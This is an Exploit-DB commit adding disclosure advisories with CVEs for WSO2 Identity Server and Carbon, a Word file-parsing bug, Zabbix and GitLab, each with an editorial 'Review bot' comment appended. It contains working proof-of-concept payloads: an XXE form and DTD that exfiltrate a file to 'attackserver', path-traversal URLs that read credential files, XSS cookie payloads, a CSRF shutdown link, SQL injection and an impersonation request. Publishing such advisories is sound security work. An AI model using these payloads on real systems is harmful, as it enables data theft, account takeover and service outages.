DB: 2016-08-16

Offensive Security 2016-08-16 20:39:41 +00:00
parent 8c28728c9f
commit 24a0e1921a
8 changed files with 1961 additions and 1324 deletions

files.csv
File diff suppressed because it is too large

platforms/jsp/webapps/40239.txt Executable file

@ -0,0 +1,135 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.wso2.com
Product:
============================
Wso2 Identity Server v5.1.0
As the industrys first enterprise identity bus (EIB), WSO2 Identity Server
is the central backbone
that connects and manages multiple identities across applications, APIs,
the cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to
propagate identities across geographical
and enterprise borders in a connected business environment.
Vulnerability Type:
============================
XML External Entity / CSRF
CVE Reference(s):
===================
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)
Vulnerability Details:
=====================
WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can
be exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.
The exploit can be carried out locally by an internal malicious user or
remote via CSRF if an authenticated user clicks an attacker
supplied link or visits a evil webpage. In case of WSO2IS system files can
be read / exfiltrated to the remote attackers server
for safe keeping -_-
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096
Exploit code(s):
===============
XXE POC, exfiltrate the victims Windows hosts file to our remote server.
1) Form for the XXE POST request.
<form id='XXE' action="
https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false"
method="post">
<textarea rows="20" cols="100" name="txtRequest">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\System32\drivers\etc\hosts">
<!ENTITY % dtd SYSTEM "http://attackserver:8080/payload.dtd">
%dtd;]>
<Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17"
CombinedDecision="false" ReturnPolicyIdList="false">
<Attributes>
<Attribute>&send;</Attribute>
</Attributes>
</Request>
&lt;/textarea&gt;
<input type="hidden" name="forwardTo" value="eval-policy.jsp">
<script>document.getElementById('XXE').submit()</script>
</form>
2) DTD file on attacker server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attackserver:8080?%file;'>">
%all;
3) On attack server create listener for the victims HTTP request.
python -m SimpleHTTPServer 8080
Disclosure Timeline:
============================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
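Review bot: in step 1 of "Exploit code(s)" the closing textarea tag is written HTML-entity-encoded as `&lt;/textarea&gt;` while every other tag in the form is literal, so as committed the form is not well-formed and the `<input type="hidden" name="forwardTo" ...>` and `<script>` lines fall inside the textarea's text content; write the literal `</textarea>` to match the opening `<textarea ... name="txtRequest">`. A second, smaller point: "Vulnerability Details" attributes the issue to a "weakly configured XML parser" but never names the parser feature at fault, so a one-line remediation statement (external entity and DTD processing must be disabled for the XACML request parser, as covered by the vendor advisory WSO2-2016-0096 linked under References) would make the entry useful to defenders as well as to testers.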

platforms/jsp/webapps/40240.txt Executable file

@ -0,0 +1,120 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.wso2.com
Product:
====================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are
built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common
middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
Vulnerability Type:
=========================
Local File Inclusion (LFI)
CVE Reference:
==============
CVE-2016-4314
Vulnerability Details:
=====================
An authenticated user can download configuration files in the filesystem
via downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon
log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
hence can access any file in the file system.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
Example: accessing the registry.xml file via Local File Inclusion exposes
the MySQL passwords.
<currentDBConfig>mysql-db</currentDBConfig>
<dbConfig name="mysql-db">
<url>jdbc:mysql://localhost:3306/regdb</url>
<userName>regadmin</userName>
<password>regadmin</password>
<driverName>com.mysql.jdbc.Driver</driverName>
<maxActive>80</maxActive>
<maxWait>6000</maxWait>
<minIdle>5</minIdle>
</dbConfig>
Exploit code(s):
===============
LFI to read Database creds, truststore key file, web.xml etc...
1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
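Review bot: steps 1 and 2 under "Exploit code(s)" both carry the label "Read MySQL creds" although they fetch different files (`repository/conf/registry.xml` versus `repository/conf/datasources/master-datasources.xml`); label step 2 by its target, for instance "Read datasource credentials (master-datasources.xml)". Step 1 also appends `&tenantDomain=&serviceName=` while steps 2 to 4 omit them, so either state that the two parameters are optional or include them consistently. Finally, "Exploitation Technique: Local" sits oddly beside "Vulnerability Details", which describes an authenticated request to the HTTPS admin service; "Remote (authenticated)" would describe the entry more accurately.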

platforms/jsp/webapps/40241.txt Executable file

@ -0,0 +1,125 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.wso2.com
Product:
==================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
Vulnerability Type:
===========================
Persistent / Reflected
Cross Site Scripting (XSS) - Cookie Disclosure
CVE Reference:
==============
CVE-2016-4316
Vulnerability Details:
=====================
WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy,
stealing session cookies and used as a platform for further attacks on the system.
Exploit code(s)
===============
Persistent XSS:
GET Request
https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(document.cookie)</script>
Request two is POST
/carbon/identity-mgt/challenges-mgt-finish.jsp
setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question0=&question1=City+where+you+were+born+%3F&setId1=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question1=City+where+you+were+born+%3F&question2=Father%27s+middle+name+%3F&setId2=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question2=Father%27s+middle+name+%3F&question3=Name+of+your+first+pet+%3F&setId3=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question3=Name+of+your+first+pet+%3F&question4=Favorite+sport+%3F&setId4=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question4=Favorite+sport+%3F&question5=Favorite+food+%3F&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question5=Favorite+food+%3F&question6=Favorite+vacation+location+%3F&setId6=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question6=Favorite+vacation+location+%3F&question7=Model+of+your+first+car+%3F&setId7=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question7=Model+of+your+first+car+%3F&question8=Name+of+the+hospital+where+you+were+born+%3F&setId8=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question8=Name+of+the+hospital+where+you+were+born+%3F&setId9=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question9=XSS
Then XSS payload will be listed here in below URL:
https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1&item=identity_security_questions_menu
Finally when victim clicks to "Delete" entry on the page the XSS is executed.
Here is stored payload from the HTML source
<a onclick="removeSet('\x22/><script>alert(666)</script>')" style='background-image:url(images/delete.gif);' type="button" class="icon-link">Delete</a></td>
///////////////////////////////////////////////////////////////////////////////////////////////////////////
Reflected XSS
XSS #1
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E
XSS #2
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=HELL
XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=true
XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E&defaultHostName=victim-server&webappType=
XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&driver=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&username=root&dsType=RDBMS&customDsType=RDBMS&dsProviderType=default&dsclassname=undefined&dsclassname=undefined&dsproviderProperties=undefined&editMode=false&changePassword=true&newPassword=
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
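Review bot: the stored payload quoted under "Here is stored payload from the HTML source" reads `alert(666)`, whereas the GET request and the "Request two" POST body above inject `alert(document.cookie)`, so the two captures come from different runs; either re-capture the page source after the documented request or say that the payload text differs. The POST body also repeats each of `question1` through `question8` twice (once before and once after its `setIdN`), which looks like a duplicated form serialisation; confirming whether the duplicates matter, and trimming them if not, would make the PoC easier to reproduce and read.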

platforms/jsp/webapps/40242.txt Executable file

@ -0,0 +1,103 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
[+] ISR: ApparitionSec
Vendor:
============
www.wso2.com
Product:
==================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
Vulnerability Type:
=================================
Cross Site Request Forgery / DOS
CVE Reference:
==============
CVE-2016-4315
Vulnerability Details:
=====================
The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks.
String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
try {
if ("restart".equals(action)) {
client.restart();
} else if ("restartGracefully".equals(action)) {
client.restartGracefully();
} else if ("shutdown".equals(action)) {
client.shutdown();
} else if ("shutdownGracefully".equals(action)) {
client.shutdownGracefully();
}
} catch (Exception e) {
response.sendError(500, e.getMessage());
return;
}
Exploit code(s):
===============
Shutdown the Carbon server
<a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown">Shut it down!</a>
Disclosure Timeline:
==========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
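Review bot: the Java excerpt under "Vulnerability Details" is presented without saying which file it is taken from, and `ctx`, `backendServerURL`, `CharacterEncoder` and `ServerAdminClient` appear without their surrounding page context; a one-line note naming the source (the PoC targets `carbon/server-admin/proxy_ajaxprocessor.jsp`, which is the obvious candidate) would let readers verify the claim. The excerpt itself does support the advisory: it dispatches on `request.getParameter("action")` with neither an anti-CSRF token check nor a restriction to POST, which is exactly why the single GET link in "Exploit code(s)" works against a logged-in admin. The entry would be stronger for defenders if "Vulnerability Details" also stated the remediation (token check and POST-only handling, as covered by the WSO2-2016-0101 advisory linked under References) rather than leaving it to the external link.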


@ -0,0 +1,63 @@
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2013,2016
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3316
# COSIG-2016-32
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3]
under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several
other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985),
Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed
as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite.
Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
(https://en.wikipedia.org/wiki/Microsoft_Word)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-15: Francis Provencher of COSIG report the vulnerability to MSRC.
2016-06-07: MSRC confirm the vulnerability
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.
#######################################################################################
===================
3) Technical details
===================
The specific flaw exists within the parsing of invalid operand in “sprmSdyaTop” into a SEPX structure.
An attacker can use this flaw to read outside the allocated buffer, which could allow for the execution of arbitrary code in the context of the current process.
#######################################################################################
==========
4) POC
==========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/08/COSIG-2016-32.doc
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40238.zip
#######################################################################################
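Review bot: the "1) Introduction" section pastes the Wikipedia paragraph together with its citation markers `[3]` and `[4][5][6]`, but the file carries no reference list, so the markers dangle; drop them and keep only the Wikipedia URL already given. In "2) Report Timeline", "report the vulnerability" and "MSRC confirm the vulnerability" should be past tense ("reported", "confirmed"), and "Versions: Microsoft Office Word 2013,2016" wants a space after the comma. Note also that this hunk has no file header (path and mode) on the rendered page, unlike the other files in the commit, so the entry can only be tied to its EDB-ID through the `40238.zip` link in "4) POC".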

platforms/php/webapps/40237.txt Executable file

@ -0,0 +1,49 @@
==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: 1N3@CrowdShield
==========================================
Vendor Description:
=====================
Zabbix is an open source availability and performance monitoring solution.
Vulnerability Overview:
=====================
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
Business Impact:
=====================
By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
Proof of Concept:
=====================
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
Disclosure Timeline:
=====================
7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed
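Review bot: the header lists "Vulnerable Version(s): 2.2.x, 3.0.x" but "Fixed Version: 3.0.4" names a fix only for the 3.0 branch; state the fixed 2.2 release as well, or point 2.2 users explicitly at the ZBX-11023 patch link, so the entry is not read as leaving 2.2.x unpatched. The "Result" trace ends in `/home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185`, a developer checkout path; the in-tree path `frontends/php/include/profiles.inc.php:185` is what readers need to locate the unsanitised `toggle_ids` handling that "Vulnerability Overview" describes.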


@ -0,0 +1,35 @@
# Exploit Title: GitLab privilege escalation via "impersonate" feature
# Date: 02-05-2016
# Software Link: https://about.gitlab.com/
# Version: 8.2.0 - 8.2.4, 8.3.0 - 8.3.8, 8.4.0 - 8.4.9, 8.5.0 - 8.5.11, 8.6.0 - 8.6.7, 8.7.0
# Exploit Author: Kaimi
# Website: https://kaimi.ru
# CVE: CVE-2016-4340
# Category: webapps
1. Description
Any registered user can "log in" as any other user, including administrators.
https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/
2. Proof of Concept
Login as regular user.
Get current authenticity token by observing any POST-request (ex.: change any info in user profile).
Craft request using this as template:
POST /admin/users/stop_impersonation?id=root
. . .
_method=delete&authenticity_token=lqyOBt5U%2F0%2BPM2i%2BGDx3zaVjGgAqHzoteQ15FnrQ3E8%3D
Where 'root' - desired user. 'authenticity_token' - token obtained on the previous step.
3. Solution:
Use officialy provided solutions:
https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/
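Review bot: the "# Date: 02-05-2016" header is ambiguous between 2 May and 5 February 2016; the linked patch post carries the path `2016/05/02`, so write the date as 2016-05-02 to match the other entries in this commit. In "3. Solution", "officialy" should be "officially". The same GitLab URL is given twice (under "1. Description" and "3. Solution"); keeping it once under Solution, with the Description line saying the affected releases are those listed in the "# Version" header, would read more cleanly.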